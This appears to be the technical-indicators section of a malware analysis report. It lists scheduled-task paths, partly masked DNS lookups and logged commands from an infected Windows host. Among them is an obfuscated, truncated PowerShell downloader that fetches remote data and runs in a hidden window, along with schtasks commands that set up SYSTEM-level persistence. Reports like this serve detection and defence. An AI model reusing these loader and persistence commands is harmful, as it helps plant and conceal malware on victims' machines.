Technical Information
- <SYSTEM32>\tasks\t.zer9g.com
- <SYSTEM32>\tasks\al8oc0pp
- <SYSTEM32>\tasks\cz3ytou\4c5fdvxyhh
- 'localhost':80
- DNS ASK t.##r9g.com
- DNS ASK t.##3r0.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase6...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.zer9g.com /F /tr t.zer9g.com
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \Al8oC0pP /F /tr "powershell -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /run /tn \Al8oC0pP
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase6...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn cz3YTOU\4C5fdVxyHh /F /tr "powershell -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /run /tn cz3YTOU\4C5fdVxyHh